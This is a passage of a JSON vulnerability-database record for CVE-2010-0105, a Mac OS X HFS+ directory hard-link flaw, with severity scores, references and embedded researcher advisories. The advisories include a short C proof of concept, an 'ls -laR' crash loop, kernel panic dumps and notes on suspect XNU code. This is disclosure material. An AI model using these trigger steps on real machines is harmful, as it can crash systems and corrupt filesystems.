        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.3"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.4"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.6.3"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:apple:mac_os_x",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:apple:mac_os_x_server",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Maksymilian Arciemowicz max@jestsuper.pl",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2010-0105",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2010-0105",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "VHN-42710",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2010-0105",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2010-0105",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201004-447",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-42710",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component. Apple Mac OS X is prone to a local denial-of-service vulnerability. \nExploiting this issue allows local, unprivileged users to crash affected system, denying further service to legitimate users. \nApple Mac OS X 10.6.2 and 10.6.3 are affected; other versions may also be vulnerable. Apple Mac is the operating system used by the Apple family of computers. MacOSX/XNU HFS Multiple Vulnerabilities\nMaksymilian Arciemowicz\nhttp://cxsecurity.com/\nhttp://cifrex.org/\n\n===================\n\nOn November 8th, I\u0027ve reported vulnerability in hard links for HFS+\n(CVE-2013-6799)\n\nhttp://cxsecurity.com/issue/WLB-2013110059\n\nThe HFS+ file system does not apply strict privilege rules during the\ncreating of hard links. The ability to create hard links to directories is\nwrong implemented and such an issue is affecting os versions greater or\nequal to 10.5. Officially Apple allows you to create hard links only for\nyour time machine. \u003csee wiki\u003e Vulnerability CVE-2013-6799 (incomplete fix\nfor CVE-2010-0105) allow to create hard link to directory and the number of\nhard links may be freely high. To create N hard links, you must use a\nspecial algorithm which creates links from the top of the file system tree. \nThis means that first we create the directory structure and once created we\nneed to go from up to down by creating hard links. The last time I\u0027ve\nmentioned of the possibility of a kernel crash by performing the \u0027ls\u0027\ncommand. This situation occurs in conjunction with the \u0027find\u0027 application. 
\n\nCommands such as \u0027ls\u0027 behave in unexpected ways. Apple are going find this\ncrash point in code. To create huge hard links structure, use this code\n\nhttp://cert.cx/stuff/l2.c\n\n-----------------------------------\nh1XSS:tysiak cx$ uname -a\nDarwin 000000000000000.home 13.1.0 Darwin Kernel Version 13.1.0: Thu Jan 16\n19:40:37 PST 2014; root:xnu-2422.90.20~2/RELEASE_X86_64 x86_64\nh1xss:tysiak cx$ gcc -o l2 l2.c\nh1xss:tysiak cx$ ./l2 1000\n... \nh1xss:tysiak cx$ cat loop.sh\n#!/bin/bash\nwhile [ 1 ] ; do\nls -laR B \u003e /dev/null\ndone\n\nh1xss:tysiak cx$ sh ./loop.sh\nls: B: No such file or directory\nls: X1: No such file or directory\n... \nls: X8: Bad address\nls: X1: Bad address\nls: X2: Bad address\n... \nls: X8: No such file or directory\n./loop.sh: line 4:  8816 Segmentation fault: 11  ls -laR B \u003e /dev/null\n./loop.sh: line 4:  8818 Segmentation fault: 11  ls -laR B \u003e /dev/null\nls: B: No such file or directory\nls: X1: No such file or directory\nls: X2: No such file or directory\n... \nls: X1: No such file or directory\nls: X2: No such file or directory\n-----------\n... \n-----------\nFeb  9 21:16:38 h1xss.home ReportCrash[9419]: Saved crash report for\nls[9418] version 230 to\n/Users/freak/Library/Logs/DiagnosticReports/ls_2014-02-09-211638_h1XSS.crash\n-----------\n\nThat what we can see here is unexpected behavior of LS command. LS process\nis also affected for infinite loop (recursion?). \n\n-----------\nh1xss:tysiak cx$ ps -fp 8822\n  UID   PID  PPID   C STIME   TTY           TIME CMD\n  501  8822  8810   0  7:36   ttys002   62:19.65 ls -laR B\n-----------\n\nor used parallely with (find . 
\u003e /dev/null) command, causes a kernel crash\n\n-----------\nMon Mar 31 20:30:41 2014\npanic(cpu 0 caller 0xffffff80044dbe2e): Kernel trap at 0xffffff8004768838,\ntype 13=general protection, registers:\nCR0: 0x0000000080010033, CR2: 0xffffff8122877004, CR3: 0x0000000001a5408c,\nCR4: 0x00000000001606e0\nRAX: 0xffffff802bc148a0, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000008000,\nRDX: 0x0000000000000000\nRSP: 0xffffff8140d9b990, RBP: 0xffffff8140d9b9a0, RSI: 0x0000000000000018,\nRDI: 0xffffff802f23bcd0\nR8:  0xffffff8140d9bc1c, R9:  0xffffff802f26e960, R10: 0xffffff8140d9ba2c,\nR11: 0x0000000000000f92\nR12: 0xffffff801ba1a008, R13: 0xffffff8140d9bb20, R14: 0xffffff802f23bcd0,\nR15: 0xffffff802f26e960\nRFL: 0x0000000000010282, RIP: 0xffffff8004768838, CS:  0x0000000000000008,\nSS:  0x0000000000000010\nFault CR2: 0xffffff8122877004, Error code: 0x0000000000000000, Fault CPU:\n0x0\n\nBacktrace (CPU 0), Frame : Return Address\n0xffffff811eee8c50 : 0xffffff8004422fa9\n\nBSD process name corresponding to current thread: ls\n-----------\n\nXNU is the computer operating system kernel that Apple Inc. acquired and\ndeveloped for use in the Mac OS X operating system and released as free and\nopen source software as part of the Darwin operating system. We can try to\nsee the HFS implementation code. Let\u0027s start static code analysis using the\ncifrex.org tool!\n\n-1.---------------------------------------------------------\nUnchecked Return Value to NULL Pointer Dereference in hfs_vfsops.c\n\nCode:\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c\n\n--- hfs_vfsops.c ----------------------------\n/*\n * HFS filesystem related variables. \n */\nint\nhfs_sysctl(int *name, __unused u_int namelen, user_addr_t oldp, size_t\n*oldlenp,\nuser_addr_t newp, size_t newlen, vfs_context_t context)\n{\n... 
\n       if ((newlen \u003c= 0) || (newlen \u003e MAXPATHLEN))\n            return (EINVAL);\n\n        bufsize = MAX(newlen * 3, MAXPATHLEN);\n        MALLOC(filename, char *, newlen, M_TEMP, M_WAITOK);\n        if (filename == NULL) { \u003c=====================================\nfilename CHECK\n            error = ENOMEM;\n            goto encodinghint_exit;\n        }\n        MALLOC(unicode_name, u_int16_t *, bufsize, M_TEMP, M_WAITOK);\n        if (filename == NULL) { \u003c======================================\ndouble CHECK?\n            error = ENOMEM;\n            goto encodinghint_exit;\n        }\n\n        error = copyin(newp, (caddr_t)filename, newlen);\n        if (error == 0) {\n            error = utf8_decodestr((u_int8_t *)filename, newlen - 1,\nunicode_name,\n                                   \u0026bytes, bufsize, 0, UTF_DECOMPOSED);\n            if (error == 0) {\n                hint = hfs_pickencoding(unicode_name, bytes / 2);\n                error = sysctl_int(oldp, oldlenp, USER_ADDR_NULL, 0,\n(int32_t *)\u0026hint);\n            }\n        }\n--- hfs_vfsops.c----------------------------\n\nChecking \u0027filename\u0027 twice makes no sense. Probably \u0027unicode_name\u0027 should\nbe checked in the second condition. \n\n\n-2.---------------------------------------------------------\nPossible Buffer Overflow in resource fork (hfs_vnops.c)\n\nThe unverified value returned by snprintf() may be bigger than the declared buffer\n(MAXPATHLEN). \n\n\nhttps://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html\n---\nThe snprintf() and vsnprintf() functions will write at most n-1 of the\ncharacters printed into the output string (the n\u0027th character then gets the terminating `\\0\u0027); if the\nreturn value is greater than or\n     equal to the n argument, the string was too short and some of the\nprinted characters were discarded. \n     The output is always null-terminated. 
\n---\n\n\nCode:\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c\n\n--- hfs_vnops.c ----------------------------\n... \n/*\n * hfs_vgetrsrc acquires a resource fork vnode corresponding to the cnode\nthat is\n * found in \u0027vp\u0027.  The rsrc fork vnode is returned with the cnode locked\nand iocount\n * on the rsrc vnode. \n *\n ... \n */\n\nint\nhfs_vgetrsrc(struct hfsmount *hfsmp, struct vnode *vp, struct vnode **rvpp,\nint can_drop_lock, int error_on_unlinked)\n{\n\n... \n\n/*\n * Supply hfs_getnewvnode with a component name. \n */\ncn.cn_pnbuf = NULL;\nif (descptr-\u003ecd_nameptr) {\n            MALLOC_ZONE(cn.cn_pnbuf, caddr_t, MAXPATHLEN, M_NAMEI,\nM_WAITOK);\n            cn.cn_nameiop = LOOKUP;\n            cn.cn_flags = ISLASTCN | HASBUF;\n            cn.cn_context = NULL;\n            cn.cn_pnlen = MAXPATHLEN;\n            cn.cn_nameptr = cn.cn_pnbuf;\n            cn.cn_hash = 0;\n            cn.cn_consume = 0;\n            cn.cn_namelen = snprintf(cn.cn_nameptr, MAXPATHLEN,\n\u003c================\n                         \"%s%s\", descptr-\u003ecd_nameptr,\n                         _PATH_RSRCFORKSPEC);\n        }\n        dvp = vnode_getparent(vp);\n        error = hfs_getnewvnode(hfsmp, dvp, cn.cn_pnbuf ? \u0026cn : NULL,\n\u003c================\n                                descptr, GNV_WANTRSRC | GNV_SKIPLOCK,\n\u0026cp-\u003ec_attr,\n                                \u0026rsrcfork, \u0026rvp, \u0026newvnode_flags);\n\n--- hfs_vnops.c ----------------------------\n\nThe pattern is \u0027%s%s\u0027, where the summed length of descptr-\u003ecd_nameptr and\n_PATH_RSRCFORKSPEC may be bigger than the declared buffer size (MAXPATHLEN). \nThe size of descptr-\u003ecd_nameptr is MAXPATHLEN and the value of _PATH_RSRCFORKSPEC is\n\n  #define _PATH_RSRCFORKSPEC     \"/..namedfork/rsrc\"\n\nwhose length is 17 chars. A possible overflow of up to 17 chars here? 
\n\nNow let\u0027s see the hfs_getnewvnode function\n\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c\n\n--- hfs_cnode.c ----------------------------\nhfs_getnewvnode(\n    struct hfsmount *hfsmp,\n    struct vnode *dvp,\n    struct componentname *cnp, \u003c======== WATCH THIS\n    struct cat_desc *descp,\n    int flags,\n    struct cat_attr *attrp,\n    struct cat_fork *forkp,\n    struct vnode **vpp,\n    int *out_flags)\n{\n... \n                if ((*vpp != NULL) \u0026\u0026 (cnp)) {\n                    /* we could be requesting the rsrc of a hardlink\nfile... */\n                    vnode_update_identity (*vpp, dvp, cnp-\u003ecn_nameptr,\ncnp-\u003ecn_namelen, cnp-\u003ecn_hash, \u003c== NAMELEN HERE\n                            (VNODE_UPDATE_PARENT | VNODE_UPDATE_NAME));\n... \n--- hfs_cnode.c ----------------------------\n\nand the call to vnode_update_identity()\n\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c\n\n\n--- vfs_cache.c ----------------------------\nvoid\nvnode_update_identity(vnode_t vp, vnode_t dvp, const char *name, int\nname_len, uint32_t name_hashval, int flags)\n{\n... \n    if ( (flags \u0026 VNODE_UPDATE_NAME) ) {\n        if (name != vp-\u003ev_name) {\n            if (name \u0026\u0026 *name) {\n                if (name_len == 0)\n                    name_len = strlen(name);\n                tname = vfs_addname(name, name_len, name_hashval, 0); \u003c==\nNAMELEN HERE\n            }\n        } else\n            flags \u0026= ~VNODE_UPDATE_NAME;\n    }\n... 
\nconst char *\nvfs_addname(const char *name, uint32_t len, u_int hashval, u_int flags)\n{\n    return (add_name_internal(name, len, hashval, FALSE, flags));  \u003c== CALL\n\n}\n--- vfs_cache.c ----------------------------\n\nAnd an invalid memory reference in add_name_internal()\n\n--- vfs_cache.c ----------------------------\nstatic const char *\nadd_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t\nneed_extra_ref, __unused u_int flags)\n{\n    struct stringhead *head;\n    string_t          *entry;\n    uint32_t          chain_len = 0;\n    uint32_t      hash_index;\n        uint32_t      lock_index;\n    char              *ptr;\n\n    /*\n     * if the length already accounts for the null-byte, then\n     * subtract one so later on we don\u0027t index past the end\n     * of the string. \n     */\n    if (len \u003e 0 \u0026\u0026 name[len-1] == \u0027\\0\u0027) { \u003c===== INVALID MEMORY REFERENCE\n        len--;\n    }\n    if (hashval == 0) {\n        hashval = hash_string(name, len);\n    }\n--- vfs_cache.c ----------------------------\n\n\n-3.---------------------------------------------------------\nUnchecked Return Value to NULL Pointer Dereference in hfs_catalog.c and not\nonly\n\nPlease note that a buffer length check (stored in some variable)\nshould be performed; also, the return value from the *alloc() function family should be\nverified for possible NULL pointers. \nHere are a few FALSE / POSITIVE examples. \n\nhttp://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c\n\n--- hfs_catalog.c ----------------------------\n /*\n * builddesc - build a cnode descriptor from an HFS+ key\n */\nstatic int\nbuilddesc(const HFSPlusCatalogKey *key, cnid_t cnid, u_int32_t hint,\nu_int32_t encoding,\n    int isdir, struct cat_desc *descp)\n{\n    int result = 0;\n    unsigned char * nameptr;\n    size_t bufsize;\n    size_t utf8len;\n    unsigned char tmpbuff[128];\n\n    /* guess a size... 
*/\n    bufsize = (3 * key-\u003enodeName.length) + 1;\n    if (bufsize \u003e= sizeof(tmpbuff) - 1) { \u003c============================\n        MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); \u003c=\nMALLOC FAIL\n    } else {\n        nameptr = \u0026tmpbuff[0];\n    }\n\n    result = utf8_encodestr(key-\u003enodeName.unicode,\n            key-\u003enodeName.length * sizeof(UniChar),\n            nameptr, (size_t *)\u0026utf8len, \u003c============================\n\n... \n    maxlinks = MIN(entrycnt, (u_int32_t)(uio_resid(uio) /\nSMALL_DIRENTRY_SIZE));\nbufsize = MAXPATHLEN + (maxlinks * sizeof(linkinfo_t)) + sizeof(*iterator);\nif (extended) {\nbufsize += 2*sizeof(struct direntry);\n}\nMALLOC(buffer, void *, bufsize, M_TEMP, M_WAITOK);\n\u003c============================\nbzero(buffer, bufsize);\n... \nFREE(nameptr, M_TEMP);\nMALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); \u003c==============\n\nresult = utf8_encodestr(key-\u003enodeName.unicode,\n                        key-\u003enodeName.length * sizeof(UniChar),\n                        nameptr, (size_t *)\u0026utf8len,\n                        bufsize, \u0027:\u0027, 0);\n}\n ... \ncnp = (const CatalogName *)\u0026ckp-\u003ehfsPlus.nodeName;\nbufsize = 1 + utf8_encodelen(cnp-\u003eustr.unicode,\n                             cnp-\u003eustr.length * sizeof(UniChar),\n                             \u0027:\u0027, 0);\nMALLOC(new_nameptr, u_int8_t *, bufsize, M_TEMP, M_WAITOK); \u003c========\nresult = utf8_encodestr(cnp-\u003eustr.unicode,\n                        cnp-\u003eustr.length * sizeof(UniChar),\n                        new_nameptr, \u0026tmp_namelen, bufsize, \u0027:\u0027, 0);\n\n--- hfs_catalog.c ----------------------------\n\nThe above examples do not look nice either. 
Is the crux of the application and kernel crash problem\namong them?\nI informed Apple of those possible errors; more than a month has passed\nand I still have not received any comment or solution. \n\n\n--- 1. References ---\nhttp://cxsecurity.com/issue/WLB-2014040027\nhttp://cxsecurity.com/cveshow/CVE-2013-6799/\nhttp://cxsecurity.com/cveshow/CVE-2010-0105/\n\n\n--- 2. Greetz ---\nKacper George and Michal\n\n\n--- 3. Credit ---\nMaksymilian Arciemowicz\nhttp://cxsecurity.com/\nhttp://cifrex.org/\nhttp://cert.cx/\n\nBest regards,\nCXSEC TEAM\nhttp://cxsec.org/\n\n\n. Apple MacOSX 10.9 Hard Link Memory Corruption \n\nDate: 08.11.2013\nhttp://cxsecurity.com/\nhttp://cvemap.org/\n\nURL: http://cxsecurity.com/issue/WLB-2013110059\n\n- 0. Description ---\n\nIn most UNIX-like systems a hard link to a directory is only reserved for the \u0027root\u0027 user, when possible at all. \nIn MacOSX 10.6 there was one such vulnerability (CVE-2010-0105) resulting in the filesystem being corrupted; the creation of many hard links was the cause. \nA notable exception to this is Mac OS X v10.5 (Leopard) and newer, \nwhich use hard links on directories for the Time Machine backup mechanism only.\u0027\n\n\u0027Only for the Time Machine\u0027 is not true. 
Let\u0027s see a quick PoC\n\nA plain program performing a system call (link)\n----------------------------------------------\nmac-cxs-XK:pochd XK$ cat test.c\n#include \u003cstdio.h\u003e\n#include \u003cunistd.h\u003e\n\nvoid usage(const char* program)\n{\n    const char* message = \" [src_dir] [target_dir]\";\n\tfprintf(stderr, \"%s%s\\n\", program, message);\n}\n\nint main(int argc, char* argv[]) {\n    if (argc!=3) {\n        usage(argv[0]);\n\t    return 1;\n    }\n    \n    int ret = link(argv[1],argv[2]);\n    \n    fprintf(stderr,\"link(3) return= %d\\n\", ret);\n\n    return ret;\n}\n\nmac-cxs-XK:pochd XK$ gcc -o test test.c\nmac-cxs-XK:pochd XK$ ls\ntest\ttest.c\nmac-cxs-XK:pochd XK$ mkdir DIR1\nmac-cxs-XK:pochd XK$ ./test DIR1 Hardlink1\nlink(3) return= -1\nmac-cxs-XK:pochd XK$ mkdir DIR1/DIR2\nmac-cxs-XK:pochd XK$ ./test DIR1/DIR2 Hardlink2\nlink(3) return= 0\nmac-cxs-XK:pochd XK$ cd DIR1\nmac-cxs-XK:DIR1 XK$ mkdir DIR2/DIR3\nmac-cxs-XK:DIR1 XK$ ../test DIR2/DIR3 Hardlink3\nlink(3) return= 0\nmac-cxs-XK:DIR1 XK$ cd DIR2\nmac-cxs-XK:DIR2 XK$ mkdir DIR3/DIR4\nmac-cxs-XK:DIR2 XK$ ../../test DIR3/DIR4 Hardlink4\nlink(3) return= -1\n----------------------------------------------\n\n\nHardlink1 and Hardlink4 failed whereas Hardlink2 and Hardlink3 did not; so what may be the cause?\nIn my opinion we should recognize it as a security flaw, and if Apple is not going to fix this vulnerability then someone should change Wikipedia at least. \n\nThe operation (functionality) of hard links differs from that described in the \"Unix Internals: The New Frontiers\" book (by Uresh Vahalia). \nOld UNIX standards simply prevent creating any hard link to any directory for any user (root included). \n\nIs that a new CWE-DesignError vulnerability or a new UNIX style?\n\nThere may be many possible bad consequences coming out of wrong \u0027hard link\u0027 handling. 
We will not yet publish a full description of this problem, but we do know that it exists and that it may exhaust kernel/system resources;\nit may cause application crashes or kernel panics. Let\u0027s wait for a new MacOSX version. \nA/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A:\ntotal 0\nProcess 14413 stopped\n* thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylib`strlen + 18, queue = \u0027com.apple.main-thread, stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290)\n    frame #0: 0x00007fff948f7812 libsystem_c.dylib`strlen + 18\nlibsystem_c.dylib`strlen + 18:\n-\u003e 0x7fff948f7812:  pcmpeqb (%rdi), %xmm0\n   0x7fff948f7816:  pmovmskb %xmm0, %esi\n   0x7fff948f781a:  andq   $15, %rcx\n   0x7fff948f781e:  orq    $-1, %rax\n(lldb) \n(lldb) bt\n* thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylib`strlen + 18, queue = \u0027com.apple.main-thread, stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290)\n    frame #0: 0x00007fff948f7812 libsystem_c.dylib`strlen + 18\n.. \n\n\nDoes the kernel panic correspond to \u0027ls\u0027 ? More details soon. Credit ---\nMaksymilian Arciemowicz ( http://cert.cx/ )\n\nFirst CVE\u0026CWE compatible bugtraq\nhttp://cxsecurity.com/\nhttp://cvemap.org/\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "db": "PACKETSTORM",
        "id": "126039"
      },
      {
        "db": "PACKETSTORM",
        "id": "123948"
      }
    ],
    "trust": 2.16
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-42710",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2010-0105",
        "trust": 3.0
      },
      {
        "db": "BID",
        "id": "39658",
        "trust": 2.8
      },
      {
        "db": "SECTRACK",
        "id": "1024723",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447",
        "trust": 0.7
      },
      {
        "db": "NSFOCUS",
        "id": "14886",
        "trust": 0.6
      },
      {
        "db": "SREASONRES",
        "id": "20100423 MACOS X 10.6.3 FILESYSTEM HFS DENIAL OF SERVICE VULNERABILITY",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "126039",
        "trust": 0.2
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2013110059",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "134091",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "88859",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134090",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134710",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "12375",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-42710",
        "trust": 0.1
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2014040027",
        "trust": 0.1
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2005090063",
        "trust": 0.1
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2010040284",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "123948",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "PACKETSTORM",
        "id": "126039"
      },
      {
        "db": "PACKETSTORM",
        "id": "123948"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "id": "VAR-201004-0093",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-11-23T19:55:28.460000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "HT4435",
        "trust": 0.8,
        "url": "http://support.apple.com/kb/HT4435"
      },
      {
        "title": "HT4435",
        "trust": 0.8,
        "url": "http://support.apple.com/kb/HT4435?viewlocale=ja_JP"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-DesignError",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/39658"
      },
      {
        "trust": 2.0,
        "url": "http://securityreason.com/achievement_securityalert/83"
      },
      {
        "trust": 1.2,
        "url": "http://support.apple.com/kb/ht4435"
      },
      {
        "trust": 1.1,
        "url": "http://lists.apple.com/archives/security-announce/2010//nov/msg00000.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id?1024723"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0105"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu331391"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-0105"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/14886"
      },
      {
        "trust": 0.3,
        "url": "http://www.apple.com/macosx/"
      },
      {
        "trust": 0.2,
        "url": "http://cxsecurity.com/issue/wlb-2013110059"
      },
      {
        "trust": 0.2,
        "url": "http://cxsecurity.com/"
      },
      {
        "trust": 0.2,
        "url": "http://cert.cx/"
      },
      {
        "trust": 0.2,
        "url": "http://cxsecurity.com/cveshow/cve-2010-0105/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0105"
      },
      {
        "trust": 0.1,
        "url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c"
      },
      {
        "trust": 0.1,
        "url": "http://cifrex.org/"
      },
